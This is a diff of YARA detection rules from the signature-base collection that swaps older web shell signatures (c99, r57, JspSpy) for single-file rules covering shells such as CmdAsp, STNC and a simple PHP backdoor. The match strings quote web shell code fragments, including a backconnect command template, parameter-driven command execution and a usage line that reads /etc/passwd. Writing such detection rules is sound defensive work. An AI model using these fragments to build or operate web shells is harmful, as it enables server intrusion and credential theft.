-		hash2 = "527cf81f9272919bf872007e21c4bdda"
 
 	strings:
-		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
-		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
-		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
-		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
+		$s0 = "Codz by angel(4ngel)"
+		$s1 = "Web: http://www.4ngel.net"
+		$s2 = "$admin['cookielife'] = 86400;"
+		$s3 = "$errmsg = 'The file you want Downloadable was nonexistent';"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_W4Cking_Shell_Xxx
+rule SIGNATURE_BASE_Ak74Shell_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file ak74shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2824-L2852"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4055-L4067"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "731bbf06208d20874c1d8464472e6a66a2e9b0bc2dc0475783763b99eb70fefa"
-		score = 70
-		quality = 85
+		hash = "7f83adcb4c1111653d30c6427a94f66f"
+		logic_hash = "64eb7e72679fc9ee81af6f46d0ab604357710716b93b1ddfaebc5596c968fce8"
+		score = 75
+		quality = 60
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "9c34adbc8fd8d908cbb341734830f971"
-		hash3 = "f2fa878de03732fbf5c86d656467ff50"
-		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
-		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
-		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
-		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
-		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
-		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
+		$s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION["
+		$s2 = "AK-74 Security Team Web Site: www.ak74-team.net"
+		$s3 = "$xshell"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
+rule SIGNATURE_BASE_Rem_View_Php_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Rem View.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "6137434c-89e9-537b-9b26-b56178022b76"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2853-L2875"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4068-L4080"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d78db4d45a35d6a78d4288e00a382a0937e3806f0570bd353b88955664a47f6"
-		score = 70
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+		logic_hash = "bcd5c86e793748ffe0ce4415ee68101e8183e1f97477b49843938d254f08695a"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "$this -> addFile($content, $filename);" fullword
-		$s3 = "function addFile($data, $name, $time = 0) {" fullword
-		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
-		$s9 = "foreach($filelist as $filename){" fullword
+		$s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\""
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "Welcome to phpRemoteView (RemView)"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C66_C99_Shadows_Mod_C99Shell
+rule SIGNATURE_BASE_Java_Shell_Js
 {
 	meta:
-		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Java Shell.js.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eff52c3a-fc3a-5e80-8da9-786168159ebc"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2876-L2898"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4081-L4093"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b50a6124f25bbb6fcc9d16d1de26d833a4b968db8e8033e76f3a74695577017e"
-		score = 70
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+		logic_hash = "f312298ac30ab57b21222a529b1566b9a66909806e4bc88120ac3992cfd3c6fb"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
-		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
-		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
-		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
-		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
-		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
+		$s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword
+		$s3 = "public class JythonShell extends JPanel implements Runnable {" fullword
+		$s4 = "public static int DEFAULT_SCROLLBACK = 100"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_He1P_Jspspy_Nogfw_Ok_Style_1_Jspspy1
+rule SIGNATURE_BASE_STNC_Php_Php
 {
 	meta:
-		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file STNC.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "8a7167f6-fa62-574f-a37c-3ceadc7f92ec"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2899-L2922"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4094-L4107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "522ba5f797e33c27fef3ae8d89889c31799073ed3c770a49401f4d42ead04640"
-		score = 70
+		hash = "2e56cfd5b5014cbbf1c1e3f082531815"
+		logic_hash = "b4118dc45ac109bde1cafda24cc103370db57c1993690f450cff828c1633af3c"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash1 = "d71716df5042880ef84427acee8b121e"
-		hash2 = "344f9073576a066142b2023629539ebd"
-		hash3 = "32dea47d9c13f9000c4c807561341bee"
-		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash5 = "3ea688e3439a1f56b16694667938316d"
-		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
 
 	strings:
-		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
-		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
-		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
-		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
+		$s0 = "drmist.ru" fullword
+		$s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80"
+		$s2 = "STNC WebShell"
+		$s3 = "http://www.security-teams.net/index.php?showtopic="
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_C5_Config_Myxx_Querydong_Spyjsp2010_Zend
+rule SIGNATURE_BASE_Azrailphp_V1_0_Php
 {
 	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file aZRaiLPhp v1.0.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "60152b96-e8d3-5b06-a855-fb64a490742b"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2923-L2946"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4108-L4120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ca710973592718c5455508c5798b3c51dce994d5ebd33aa3a59d1b03c096bdf"
-		score = 70
+		hash = "26b2d3943395682e36da06ed493a3715"
+		logic_hash = "4385f294e59b644fe86d8380db4f7926924eb744ad80735b78ef778d2f7e8ae0"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash4 = "e0354099bee243702eb11df8d0e046df"
-		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash6 = "655722eaa6c646437c8ae93daac46ae0"
-		hash7 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
-		$s5 = "File tempF = new File(savePath);" fullword
-		$s9 = "if (tempF.isDirectory()) {" fullword
+		$s0 = "azrailphp"
+		$s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>"
+		$s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_C99Shell
+rule SIGNATURE_BASE_Moroccan_Spamers_Ma_Edition_By_Ghost_Php
 {
 	meta:
-		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "721d6e9f-a237-5462-a8d3-f838d7fda420"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2947-L2965"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4121-L4133"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b999b1a8307e228fb97772799369e292fb806d614159f2b2abfc7a71c5bdb225"
-		score = 70
+		hash = "d1b7b311a7ffffebf51437d7cd97dc65"
+		logic_hash = "e755e4ea467861e5217d532b161bf4c582ff71aa1e4720dfa4b75d6e8d7629d8"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s2 = "$bindport_pass = \"c99\";" fullword
-		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
+		$s0 = ";$sd98=\"john.barker446@gmail.com\""
+		$s1 = "print \"Sending mail to $to....... \";"
+		$s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Ifx_R57_Kartal_R57_Antichat
+rule SIGNATURE_BASE_Zacosmall_Php
 {
 	meta:
-		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file zacosmall.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "25946aa7-7c56-5670-ae2f-c55e65a3b911"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2966-L2987"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4134-L4146"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "23887963068f7dd2e4c85b11079276a00786d1a753f22e3b63f01139087a7f4c"
-		score = 70
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+		logic_hash = "5a2125fc447344f8cc708503d9e4dd82f9b873e40ded497ef9e01974d08bf043"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash4 = "3f71175985848ee46cc13282fbed2269"
 
 	strings:
-		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
-		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
-		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
-		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
+		$s0 = "rand(1,99999);$sj98"
+		$s1 = "$dump_file.='`'.$rows2[0].'`"
+		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_Nstview_Xxx
+rule SIGNATURE_BASE_Cmdasp_Asp
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file CmdAsp.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "79e0ba85-ed4b-5909-a2fd-9b4125598078"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2988-L3007"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4147-L4160"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b10e89c6b1851f88a2bbb9116969ea3770366c162b911cb8a2c3a033da3a46bc"
-		score = 70
+		hash = "64f24f09ec6efaa904e2492dffc518b9"
+		logic_hash = "95dc25ecd47b43edbd7e7e36966377aa09da769aff2bc1c33a7df87989611bfa"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "4745d510fed4378e4b1730f56f25e569"
-		hash2 = "f3ca29b7999643507081caab926e2e74"
-		hash3 = "46a18979750fa458a04343cf58faa9bd"
 
 	strings:
-		$s3 = "BODY, TD, TR {" fullword
-		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
-		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
+		$s0 = "CmdAsp.asp"
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s2 = "-- Use a poor man's pipe ... a temp file --"
+		$s3 = "maceo @ dogmile.com"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Xxx
+rule SIGNATURE_BASE_Simple_Backdoor_Php
 {
 	meta:
-		description = "Web Shell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file simple-backdoor.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "5607f501-a750-59be-9595-5ac71ea6f74b"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3008-L3058"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4161-L4173"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "46eede3a1af29e344ed5107fc0af4bd13cd1492bff340d61063911bbb474e7b3"
-		score = 70
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+		logic_hash = "e2e98580b59727313de298fab0009704f621b1b6556220d5065118d960f7a068"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "6acc82544be056580c3a1caaa4999956"
-		hash23 = "6aa32a6392840e161a018f3907a86968"
-		hash24 = "591ca89a25f06cf01e4345f98a22845c"
-		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash26 = "3ea688e3439a1f56b16694667938316d"
-		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash28 = "71097537a91fac6b01f46f66ee2d7749"
-		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
-		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
-		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
-		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
-		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
-		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
-		$s9 = "sis = request.getInputStream();" fullword
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->"
+		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
 
 	condition:
-		4 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_2_520_Icesword_Job_Ma1
+rule SIGNATURE_BASE_Mysql_Shell_Php
 {
 	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file mysql_shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "e517984b-575c-5ead-a438-9767d2c74099"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3059-L3079"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4174-L4186"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "795eb586310d87a3c6b53117bf2c8cbcfadcb177f5a5129c17fd21f0b64c385c"
-		score = 70
+		hash = "d42aec2891214cace99b3eb9f3e21a63"
+		logic_hash = "dbd825e1056c41efaf80c0495ba7b6cf1c88403b997ea7ac1378512a19f7ed8a"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
 
 	strings:
-		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
-		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
-		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
+		$s0 = "SooMin Kim"
+		$s1 = "smkim@popeye.snu.ac.kr"
+		$s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_404_Data_In_Jfolder_Jfolder01_Jsp_Suiyue_Warn
+rule SIGNATURE_BASE_Dive_Shell_1_0___Emperor_Hacking_Team_Php
 {
 	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-01-28"
+		description = "Semi-Auto-generated  - file Dive Shell 1.0 - Emperor Hacking Team.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d75294a4-a0a7-5c74-bb7a-766db477633c"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3080-L3104"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4187-L4200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e0da29499d76539fb1f5cfbe0a00331eeb0bb8fa861f2e2d686130ee4939fac"
-		score = 70
+		hash = "1b5102bdc41a7bc439eea8f0010310a5"
+		logic_hash = "bd51b625359799178ad3c8e02ba5bb5fca89e6e14769b86dd35c2b8a1049599f"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash7 = "e9a5280f77537e23da2545306f6a19ad"
 
 	strings:
-		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
-		$s2 = " KB </td>" fullword
-		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
-		$s4 = "<!-- <tr align=\"center\"> " fullword
+		$s0 = "Emperor Hacking TEAM"
+		$s1 = "Simshell" fullword
+		$s2 = "ereg('^[[:blank:]]*cd[[:blank:]]"
